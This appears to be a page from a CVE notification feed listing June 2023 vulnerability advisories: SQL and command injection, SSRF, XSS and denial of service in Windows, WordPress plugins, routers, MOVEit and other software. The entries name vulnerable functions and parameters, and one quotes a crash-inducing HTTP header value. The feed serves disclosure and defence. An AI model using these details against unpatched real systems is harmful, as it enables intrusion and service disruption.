🚨 CVE-2023-22610A CWE-863: Incorrect Authorization vulnerability exists that could cause Denial ofService against the Geo SCADA server when specific messages are sent to the server over thedatabase server TCP port. 🎖@cveNotify |
|
| 2023-06-14 10:58:25 |
🚨 CVE-2023-3234A vulnerability was found in Zhong Bang CRMEB up to 4.6.0. It has been declared as problematic. Affected by this vulnerability is the function put_image of the file api/controller/v1/PublicController.php. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231505 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-14 10:58:24 |
🚨 CVE-2023-3233A vulnerability was found in Zhong Bang CRMEB up to 4.6.0. It has been classified as critical. Affected is the function get_image_base64 of the file api/controller/v1/PublicController.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231504. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-14 10:58:23 |
🚨 CVE-2023-3235A vulnerability was found in mccms up to 2.6.5. It has been rated as critical. Affected by this issue is the function pic_api of the file sys/apps/controllers/admin/Comic.php. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231506 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-14 10:58:22 |
🚨 CVE-2023-3236A vulnerability classified as critical has been found in mccms up to 2.6.5. This affects the function pic_save of the file sys/apps/controllers/admin/Comic.php. The manipulation of the argument pic leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-231507.🎖@cveNotify |
|
| 2023-06-14 10:58:20 |
🚨 CVE-2023-3187A vulnerability, which was classified as critical, has been found in PHPGurukul Teachers Record Management System 1.0. Affected by this issue is some unknown functionality of the file /changeimage.php of the component Profile Picture Handler. The manipulation of the argument newpic leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231176.🎖@cveNotify |
|
| 2023-06-14 10:58:19 |
🚨 CVE-2023-3184A vulnerability was found in SourceCodester Sales Tracker Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /classes/Users.php?f=save. The manipulation of the argument firstname/middlename/lastname/username leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-231164.🎖@cveNotify |
|
| 2023-06-14 10:58:18 |
🚨 CVE-2022-40022Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability.🎖@cveNotify |
|
| 2023-06-14 10:58:17 |
🚨 CVE-2023-3189A vulnerability, which was classified as problematic, was found in SourceCodester Online School Fees System 1.0. This affects an unknown part of the file /paysystem/branch.php of the component POST Parameter Handler. The manipulation of the argument branch leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-231501 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-14 10:58:16 |
🚨 CVE-2023-3227Insufficient Granularity of Access Control in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-14 10:58:15 |
🚨 CVE-2023-3228Business Logic Errors in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-14 10:58:14 |
🚨 CVE-2023-3229Business Logic Errors in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-14 10:58:12 |
🚨 CVE-2023-3230Missing Authorization in GitHub repository fossbilling/fossbilling prior to 0.5.0.🎖@cveNotify |
|
| 2023-06-14 06:58:40 |
🚨 CVE-2023-24937Windows CryptoAPI Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:39 |
🚨 CVE-2023-24938Windows CryptoAPI Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:38 |
🚨 CVE-2023-29358Windows GDI Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:37 |
🚨 CVE-2023-29369Remote Procedure Call Runtime Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:36 |
🚨 CVE-2023-32008Windows Resilient File System (ReFS) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:32 |
🚨 CVE-2023-32011Windows iSCSI Discovery Service Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:31 |
🚨 CVE-2023-32014Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:30 |
🚨 CVE-2023-32017Microsoft PostScript Printer Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:29 |
🚨 CVE-2023-32019Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:28 |
🚨 CVE-2023-32021Windows SMB Witness Service Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:24 |
🚨 CVE-2023-32032.NET and Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:23 |
🚨 CVE-2023-21565Azure DevOps Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:22 |
🚨 CVE-2023-29346NTFS Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:21 |
🚨 CVE-2023-29352Windows Remote Desktop Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:17 |
🚨 CVE-2023-29355DHCP Server Service Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:16 |
🚨 CVE-2023-29359GDI Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:15 |
🚨 CVE-2023-29362Remote Desktop Client Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:14 |
🚨 CVE-2023-29366Windows Geolocation Service Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 06:58:13 |
🚨 CVE-2023-21569Azure DevOps Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-06-14 00:58:22 |
🚨 CVE-2023-24470Potential XML External Entity Injection in ArcSight Logger versions prior to 7.3.0.🎖@cveNotify |
|
| 2023-06-14 00:58:21 |
🚨 CVE-2023-31142Discourse is an open source discussion platform. Prior to version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches, if a site has modified their general category permissions, they could be set back to the default. This issue is patched in version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches. A workaround, only if you are modifying the general category permissions, is to use a new category for the same purpose.🎖@cveNotify |
|
| 2023-06-14 00:58:20 |
🚨 CVE-2023-32061Discourse is an open source discussion platform. Prior to version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches, the lack of restrictions on the iFrame tag makes it easy for an attacker to exploit the vulnerability and hide subsequent comments from other users. This issue is patched in version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches. There are no known workarounds.🎖@cveNotify |
|
| 2023-06-14 00:58:19 |
🚨 CVE-2023-32301Discourse is an open source discussion platform. Prior to version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches, multiple duplicate topics could be created if topic embedding is enabled. This issue is patched in version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches. As a workaround, disable topic embedding if it has been enabled.🎖@cveNotify |
|
| 2023-06-14 00:58:17 |
🚨 CVE-2023-34250Discourse is an open source discussion platform. Prior to version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches, an attacker could use the new topics dismissal endpoint to reveal the number of topics recently created (but not the actual content thereof) in categories they didn't have access to. This issue is patched in version 3.0.4 of the `stable` branch and version 3.1.0.beta5 of the `beta` and `tests-passed` branches. There are no known workarounds.🎖@cveNotify |
|
| 2023-06-14 00:58:16 |
🚨 CVE-2023-24469Potential Cross-Site Scripting in ArcSight Logger versions prior to 7.3.0🎖@cveNotify |
|
| 2023-06-14 00:58:15 |
🚨 CVE-2022-41085Azure CycleCloud Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-14 00:58:14 |
🚨 CVE-2022-41119Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-06-14 00:58:13 |
🚨 CVE-2022-38014Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-06-13 22:58:14 |
🚨 CVE-2014-9708Embedthis Appweb before 4.6.6 and 5.x before 5.2.1 allows remote attackers to cause a denial of service (NULL pointer dereference) via a Range header with an empty value, as demonstrated by "Range: x=,".🎖@cveNotify |
|
| 2023-06-13 22:58:13 |
🚨 CVE-2019-11358jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.🎖@cveNotify |
|
| 2023-06-13 21:58:31 |
🚨 CVE-2023-27836TP-Link TL-WPA8630P (US)_ V2_ Version 171011 was discovered to contain a command injection vulnerability via the devicePwd parameter in the function sub_ 40A80C.🎖@cveNotify |
|
| 2023-06-13 21:58:30 |
🚨 CVE-2023-34965SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information.🎖@cveNotify |
|
| 2023-06-13 21:58:29 |
🚨 CVE-2023-3224Code Injection in GitHub repository nuxt/nuxt prior to 3.5.3.🎖@cveNotify |
|
| 2023-06-13 21:58:26 |
🚨 CVE-2022-43684ServiceNow has released patches and an upgrade that address an Access Control List (ACL) bypass issue in ServiceNow Core functionality.Additional DetailsThis issue is present in the following supported ServiceNow releases: * Quebec prior to Patch 10 Hot Fix 8b * Rome prior to Patch 10 Hot Fix 1 * San Diego prior to Patch 7 * Tokyo prior to Tokyo Patch 1; and * Utah prior to Utah General Availability If this ACL bypass issue were to be successfully exploited, it potentially could allow an authenticated user to obtain sensitive information from tables missing authorization controls.🎖@cveNotify |
|
| 2023-06-13 21:58:25 |
🚨 CVE-2023-31893Telefnica Brasil Vivo Play (IPTV) Firmware: 2023.04.04.01.06.15 is vulnerable to Denial of Service (DoS) via DNS Recursion.🎖@cveNotify |
|
| 2023-06-13 21:58:24 |
🚨 CVE-2023-2253A flaw was found in the `/v2/_catalog` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: `n`). This vulnerability allows a malicious user to submit an unreasonably large value for `n,` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.🎖@cveNotify |
|
| 2023-06-13 21:58:20 |
🚨 CVE-2022-22076information disclosure due to cryptographic issue in Core during RPMB read request.🎖@cveNotify |
|
| 2023-06-13 21:58:19 |
🚨 CVE-2022-33224Memory corruption in core due to buffer copy without check9ing the size of input while processing ioctl queries.🎖@cveNotify |
|
| 2023-06-13 21:58:15 |
🚨 CVE-2023-0976A command Injection Vulnerability in TA for mac-OS prior to version 5.7.9 allows local users to place an arbitrary file into the /Library/Trellix/Agent/bin/ folder. The malicious file is executed by running the TA deployment feature located in the System Tree. 🎖@cveNotify |
|
| 2023-06-13 21:58:14 |
🚨 CVE-2023-33538TP-Link TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2 was discovered to contain a command injection vulnerability via the component /userRpm/WlanNetworkRpm .🎖@cveNotify |
|
| 2023-06-13 18:58:30 |
🚨 CVE-2023-34097hoppscotch is an open source API development ecosystem. In versions prior to 2023.4.5 the database password is exposed in the logs when showing the database connection string. Attackers with access to read system logs will be able to elevate privilege with full access to the database. Users are advised to upgrade. There are no known workarounds for this vulnerability. 🎖@cveNotify |
|
| 2023-06-13 18:58:29 |
🚨 CVE-2022-31635Potential time-of-check to time-of-use (TOCTOU) vulnerabilities have been identified in the BIOS for certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-06-13 18:58:28 |
🚨 CVE-2023-31437An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed.🎖@cveNotify |
|
| 2023-06-13 18:58:24 |
🚨 CVE-2023-31541A unrestricted file upload vulnerability was discovered in the ‘Browse and upload images’ feature of the CKEditor v1.2.3 plugin for Redmine, which allows arbitrary files to be uploaded to the server.🎖@cveNotify |
|
| 2023-06-13 18:58:23 |
🚨 CVE-2023-34247Keystone is a content management system for Node.JS. There is an open redirect in the `@keystone-6/auth` package versions 7.0.0 and prior, where the redirect leading `/` filter can be bypassed. Users may be redirected to domains other than the relative host, thereby it might be used by attackers to re-direct users to an unexpected location. To mitigate this issue, one may apply a patch from pull request 8626 or avoid using the `@keystone-6/auth` package.🎖@cveNotify |
|
| 2023-06-13 18:58:22 |
🚨 CVE-2023-34249benjjvi/PyBB is an open source bulletin board. Prior to commit dcaeccd37198ecd3e41ea766d1099354b60d69c2, benjjvi/PyBB is vulnerable to SQL Injection. This vulnerability has been fixed as of commit dcaeccd37198ecd3e41ea766d1099354b60d69c2. As a workaround, a user may be able to update the software manually to avoid this problem by sanitizing user queries to `BulletinDatabaseModule.py`.🎖@cveNotify |
|
| 2023-06-13 18:58:19 |
🚨 CVE-2022-31637Potential time-of-check to time-of-use (TOCTOU) vulnerabilities have been identified in the BIOS for certain HP PC products, which might allow arbitrary code execution, escalation of privilege, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-06-13 18:58:18 |
🚨 CVE-2023-27837TP-Link TL-WPA8630P (US)_ V2_ Version 171011 was discovered to contain a command injection vulnerability via the key parameter in the function sub_ 40A774.🎖@cveNotify |
|
| 2023-06-13 18:58:17 |
🚨 CVE-2023-28598Zoom for Linux clients prior to 5.13.10 contain an HTML injection vulnerability. If a victim starts a chat with a malicious user it could result in a Zoom application crash.🎖@cveNotify |
|
| 2023-06-13 18:58:13 |
🚨 CVE-2023-31438An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications.🎖@cveNotify |
|
| 2023-06-13 18:58:12 |
🚨 CVE-2023-20867A fully compromised ESXi host can force VMware Tools to fail to authenticate host-to-guest operations, impacting the confidentiality and integrity of the guest virtual machine.🎖@cveNotify |
|
| 2023-06-13 16:58:18 |
🚨 CVE-2023-0545The Hostel WordPress plugin before 1.1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-06-13 16:58:14 |
🚨 CVE-2021-4364The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the jobsearch_add_job_import_schedule_call() function in versions up to, and including, 1.8.1. This makes it possible for authenticated attackers to add and/or modify schedule calls.🎖@cveNotify |
|
| 2023-06-13 16:58:13 |
🚨 CVE-2021-4367The Flo Forms – Easy Drag & Drop Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Options Change by using the flo_import_forms_options AJAX action in versions up to, and including, 1.0.35 due to insufficient input sanitization and output escaping along with missing capability checks. This makes it possible for authenticated attackers, like subscribers, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-13 16:58:12 |
🚨 CVE-2021-4363The WP Quick FrontEnd Editor plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 5.5 due to insufficient input sanitization and output escaping on the 'save_content_front' function that uses print_r on the user-supplied $_REQUEST values . This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-13 14:58:30 |
🚨 CVE-2023-2276The WCFM Membership – WooCommerce Memberships for Multivendor Marketplace plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 2.10.7. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for unauthenticated attackers to change user passwords and potentially take over administrator accounts.🎖@cveNotify |
|
| 2023-06-13 14:58:26 |
🚨 CVE-2023-34940** UNSUPPORTED WHEN ASSIGNED ** Asus RT-N10LX Router v2.0.0.39 was discovered to contain a stack overflow via the url parameter at /start-apply.html. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-06-13 14:58:25 |
🚨 CVE-2022-43777Potential Time-of-Check to Time-of Use (TOCTOU) vulnerabilities have been identified in the HP BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-06-13 14:58:24 |
🚨 CVE-2022-27541Potential Time-of-Check to Time-of Use (TOCTOU) vulnerabilities have been identified in the HP BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-06-13 14:58:23 |
🚨 CVE-2023-1898Atlas Copco Power Focus 6000 web server uses a small amount of session ID numbers. An attacker could enter a session ID number to retrieve data for an active user’s session.🎖@cveNotify |
|
| 2023-06-13 14:58:20 |
🚨 CVE-2023-1899Atlas Copco Power Focus 6000 web server is not a secure connection by default, which could allow an attacker to gain sensitive information by monitoring network traffic between user and controller.🎖@cveNotify |
|
| 2023-06-13 14:58:19 |
🚨 CVE-2023-1897Atlas Copco Power Focus 6000 web server does not sanitize the login information stored by the authenticated user’s browser, which could allow an attacker with access to the user’s computer to gain credential information of the controller.🎖@cveNotify |
|
| 2023-06-13 14:58:18 |
🚨 CVE-2022-43778Potential Time-of-Check to Time-of Use (TOCTOU) vulnerabilities have been identified in the HP BIOS for certain HP PC products which may allow arbitrary code execution, denial of service, and information disclosure.🎖@cveNotify |
|
| 2023-06-13 14:58:14 |
🚨 CVE-2023-28478TP-Link EC-70 devices through 2.3.4 Build 20220902 rel.69498 have a Buffer Overflow.🎖@cveNotify |
|
| 2023-06-13 14:58:13 |
🚨 CVE-2023-2807Authentication Bypass by Spoofing vulnerability in the password reset process of Pandora FMS allows an unauthenticated attacker to initiate a password reset process for any user account without proper authentication. This issue affects PandoraFMS v771 and prior versions on all platforms.🎖@cveNotify |
|
| 2023-06-13 14:58:12 |
🚨 CVE-2023-3048Authorization Bypass Through User-Controlled Key vulnerability in TMT Lockcell allows Authentication Abuse, Authentication Bypass.This issue affects Lockcell: before 15.🎖@cveNotify |
|
| 2023-06-13 12:58:27 |
🚨 CVE-2023-3218Race Condition within a Thread in GitHub repository it-novum/openitcockpit prior to 4.6.5.🎖@cveNotify |
|
| 2023-06-13 12:58:26 |
🚨 CVE-2023-29167Out-of-bound reads vulnerability exists in FRENIC RHC Loader v1.1.0.3. If a user opens a specially crafted FNE file, sensitive information on the system where the affected product is installed may be disclosed or arbitrary code may be executed.🎖@cveNotify |
|
| 2023-06-13 12:58:25 |
🚨 CVE-2023-30766Hidden functionality issue exists in KB-AHR series and KB-IRIP series. If this vulnerability is exploited, an arbitrary OS command may be executed on the product or the device settings may be altered. Affected products and versions are as follows: KB-AHR04D versions prior to 91110.1.101106.78, KB-AHR08D versions prior to 91210.1.101106.78, KB-AHR16D versions prior to 91310.1.101106.78, KB-IRIP04A versions prior to 95110.1.100290.78A, KB-IRIP08A versions prior to 95210.1.100290.78A, and KB-IRIP16A versions prior to 95310.1.100290.78A.🎖@cveNotify |
|
| 2023-06-13 12:58:24 |
🚨 CVE-2023-29498Improper restriction of XML external entity reference (XXE) vulnerability exists in FRENIC RHC Loader v1.1.0.3 and earlier. If a user opens a specially crafted project file, sensitive information on the system where the affected product is installed may be disclosed.🎖@cveNotify |
|
| 2023-06-13 12:58:23 |
🚨 CVE-2023-30764OS command injection vulnerability exists in KB-AHR series and KB-IRIP series. If this vulnerability is exploited, an arbitrary OS command may be executed on the product or the device settings may be altered. Affected products and versions are as follows: KB-AHR04D versions prior to 91110.1.101106.78, KB-AHR08D versions prior to 91210.1.101106.78, KB-AHR16D versions prior to 91310.1.101106.78, KB-IRIP04A versions prior to 95110.1.100290.78A, KB-IRIP08A versions prior to 95210.1.100290.78A, and KB-IRIP16A versions prior to 95310.1.100290.78A.🎖@cveNotify |
|
| 2023-06-13 12:58:21 |
🚨 CVE-2023-30762Improper authentication vulnerability exists in KB-AHR series and KB-IRIP series. If this vulnerability is exploited, an arbitrary OS command may be executed on the product or the device settings may be altered. Affected products and versions are as follows: KB-AHR04D versions prior to 91110.1.101106.78, KB-AHR08D versions prior to 91210.1.101106.78, KB-AHR16D versions prior to 91310.1.101106.78, KB-IRIP04A versions prior to 95110.1.100290.78A, KB-IRIP08A versions prior to 95210.1.100290.78A, and KB-IRIP16A versions prior to 95310.1.100290.78A.🎖@cveNotify |
|
| 2023-06-13 12:58:20 |
🚨 CVE-2023-31195ASUS Router RT-AX3000 Firmware versions prior to 3.0.0.4.388.23403 uses sensitive cookies without 'Secure' attribute. When an attacker is in a position to be able to mount a man-in-the-middle attack, and a user is tricked to log into the affected device through an unencrypted ('http') connection, the user's session may be hijacked.🎖@cveNotify |
|
| 2023-06-13 12:58:19 |
🚨 CVE-2023-31196Missing authentication for critical function in Wi-Fi AP UNIT allows a remote unauthenticated attacker to obtain sensitive information of the affected products. Affected products and versions are as follows: AC-PD-WAPU v1.05_B04 and earlier, AC-PD-WAPUM v1.05_B04 and earlier, AC-PD-WAPU-P v1.05_B04P and earlier, AC-PD-WAPUM-P v1.05_B04P and earlier, AC-WAPU-300 v1.00_B07 and earlier, AC-WAPUM-300 v1.00_B07 and earlier, AC-WAPU-300-P v1.00_B07 and earlier, and AC-WAPUM-300-P v1.00_B07 and earlier🎖@cveNotify |
|
| 2023-06-13 12:58:18 |
🚨 CVE-2023-31198OS command injection vulnerability exists in Wi-Fi AP UNIT allows. If this vulnerability is exploited, a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command. Affected products and versions are as follows: AC-PD-WAPU v1.05_B04 and earlier, AC-PD-WAPUM v1.05_B04 and earlier, AC-PD-WAPU-P v1.05_B04P and earlier, AC-PD-WAPUM-P v1.05_B04P and earlier, AC-WAPU-300 v1.00_B07 and earlier, AC-WAPUM-300 v1.00_B07 and earlier, AC-WAPU-300-P v1.00_B07 and earlier, and AC-WAPUM-300-P v1.00_B07 and earlier🎖@cveNotify |
|
| 2023-06-13 12:58:16 |
🚨 CVE-2023-32546Code injection vulnerability exists in Chatwork Desktop Application (Mac) 2.6.43 and earlier. If this vulnerability is exploited, a non-administrative user of the Mac where the product is installed may store and obtain audio and image data from the product without the user's consent.🎖@cveNotify |
|
| 2023-06-13 12:58:15 |
🚨 CVE-2023-32548OS command injection vulnerability exists in WPS Office version 10.8.0.6186. If a remote attacker who can conduct a man-in-the-middle attack connects the product to a malicious server and sends a specially crafted data, an arbitrary OS command may be executed on the system where the product is installed.🎖@cveNotify |
|
| 2023-06-13 12:58:14 |
🚨 CVE-2023-29160Stack-based buffer overflow vulnerability exists in FRENIC RHC Loader v1.1.0.3. If a user opens a specially crafted FNE file, sensitive information on the system where the affected product is installed may be disclosed or arbitrary code may be executed.🎖@cveNotify |
|
| 2023-06-13 12:58:13 |
🚨 CVE-2023-29501Jiyu Kukan Toku-Toku coupon App for iOS versions 3.5.0 and earlier, and Jiyu Kukan Toku-Toku coupon App for Android versions 3.5.0 and earlier are vulnerable to improper server certificate verification. If this vulnerability is exploited, a man-in-the-middle attack may allow an attacker to eavesdrop on an encrypted communication.🎖@cveNotify |
|
| 2023-06-13 12:58:12 |
🚨 CVE-2023-28937DataSpider Servista version 4.4 and earlier uses a hard-coded cryptographic key. DataSpider Servista is data integration software. ScriptRunner and ScriptRunner for Amazon SQS are used to start the configured processes on DataSpider Servista. The cryptographic key is embedded in ScriptRunner and ScriptRunner for Amazon SQS, which is common to all users. If an attacker who can gain access to a target DataSpider Servista instance and obtain a Launch Settings file of ScriptRunner and/or ScriptRunner for Amazon SQS, the attacker may perform operations with the user privilege encrypted in the file. Note that DataSpider Servista and some of the OEM products are affected by this vulnerability. For the details of affected products and versions, refer to the information listed in [References].🎖@cveNotify |
|
| 2023-06-13 11:58:15 |
🚨 CVE-2023-33305A loop with unreachable exit condition ('infinite loop') in Fortinet FortiOS version 7.2.0 through 7.2.4, FortiOS version 7.0.0 through 7.0.10, FortiOS 6.4 all versions, FortiOS 6.2 all versions, FortiOS 6.0 all versions, FortiProxy version 7.2.0 through 7.2.3, FortiProxy version 7.0.0 through 7.0.9, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1 all versions, FortiProxy 1.0 all versions, FortiWeb version 7.2.0 through 7.2.1, FortiWeb version 7.0.0 through 7.0.6, FortiWeb 6.4 all versions, FortiWeb 6.3 all versions allows attacker to perform a denial of service via specially crafted HTTP requests.🎖@cveNotify |
|
| 2023-06-13 06:58:25 |
🚨 CVE-2023-26295Previous versions of HP Device Manager (prior to HPDM 5.0.10) could potentially allow command injection and/or elevation of privileges.🎖@cveNotify |
|
| 2023-06-13 06:58:18 |
🚨 CVE-2023-26297Previous versions of HP Device Manager (prior to HPDM 5.0.10) could potentially allow command injection and/or elevation of privileges.🎖@cveNotify |
|
| 2023-06-13 06:58:17 |
🚨 CVE-2023-26294Previous versions of HP Device Manager (prior to HPDM 5.0.10) could potentially allow command injection and/or elevation of privileges.🎖@cveNotify |
|
| 2023-06-13 06:58:16 |
🚨 CVE-2023-32673Certain versions of HP PC Hardware Diagnostics Windows, HP Image Assistant, and HP Thunderbolt Dock G2 Firmware are potentially vulnerable to elevation of privilege.🎖@cveNotify |
|
| 2023-06-13 06:58:13 |
🚨 CVE-2023-34468The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.The resolution validates the Database URL and rejects H2 JDBC locations.You are recommended to upgrade to version 1.22.0 or later which fixes this issue.🎖@cveNotify |
|
| 2023-06-13 06:58:12 |
🚨 CVE-2023-27716An issue was discovered in freakchicken kafkaUI-lite 1.2.11 allows attackers on the same network to gain escalated privileges for the nodes running on it.🎖@cveNotify |
|
| 2023-06-13 06:58:11 |
🚨 CVE-2023-34212The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location.The resolution validates the JNDI URL and restricts locations to a set of allowed schemes.You are recommended to upgrade to version 1.22.0 or later which fixes this issue.🎖@cveNotify |
|
| 2023-06-12 06:58:22 |
🚨 CVE-2023-35036In Progress MOVEit Transfer before 2021.0.7 (13.0.7), 2021.1.5 (13.1.5), 2022.0.5 (14.0.5), 2022.1.6 (14.1.6), and 2023.0.2 (15.0.2), SQL injection vulnerabilities have been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.🎖@cveNotify |
|
| 2023-06-12 06:58:21 |
🚨 CVE-2020-36732The crypto-js package before 3.2.1 for Node.js generates random numbers by concatenating the string "0." with an integer, which makes the output more predictable than necessary.🎖@cveNotify |
|
| 2023-06-12 06:58:20 |
🚨 CVE-2023-35031Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8, Assistant V10 R0, Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8, and Manager V10 R0 allow command injection by authenticated users, aka OSFOURK-24036.🎖@cveNotify |
|
| 2023-06-12 06:58:19 |
🚨 CVE-2023-35032Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8 and Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8 allow command injection by authenticated users, aka OSFOURK-23554.🎖@cveNotify |
|
| 2023-06-12 06:58:17 |
🚨 CVE-2023-35033Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8, Assistant V10 R0, Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8, and Manager V10 R0 allow command injection by authenticated users, aka OSFOURK-23556.🎖@cveNotify |
|
| 2023-06-12 06:58:16 |
🚨 CVE-2023-35034Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8 and Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8 allow remote code execution by unauthenticated users, aka OSFOURK-24033.🎖@cveNotify |
|
| 2023-06-12 06:58:15 |
🚨 CVE-2023-35035Atos Unify OpenScape 4000 Assistant V10 R1 before V10 R1.42.0 and V10 R1.34.8, Assistant V10 R0, Manager V10 R1 before V10 R1.42.0 and V10 R1.34.8, and Manager V10 R0 allow command injection by authenticated users, aka OSFOURK-23557.🎖@cveNotify |
|
| 2023-06-11 16:58:21 |
🚨 CVE-2023-22583The Danfoss AK-EM100 web forms allow for SQL injection in the login forms.🎖@cveNotify |
|
| 2023-06-11 16:58:20 |
🚨 CVE-2023-25911The Danfoss AK-EM100 web applications allow for OS command injection through the web application parameters.🎖@cveNotify |
|
| 2023-06-11 16:58:16 |
🚨 CVE-2023-25912The webreport generation feature in the Danfoss AK-EM100 allows an unauthorized actor to generate a web report that discloses sensitive information such as the internal IP address, usernames and internal device values.🎖@cveNotify |
|
| 2023-06-11 16:58:15 |
🚨 CVE-2023-22584The Danfoss AK-EM100 stores login credentials in cleartext.🎖@cveNotify |
|
| 2023-06-11 16:58:14 |
🚨 CVE-2022-41217Cloudflow contains a unauthenticated file upload vulnerability, which makes it possible for an attacker to upload malicious files to the CLOUDFLOW PROOFSCOPE built-in storage.🎖@cveNotify |
|
| 2023-06-11 12:58:15 |
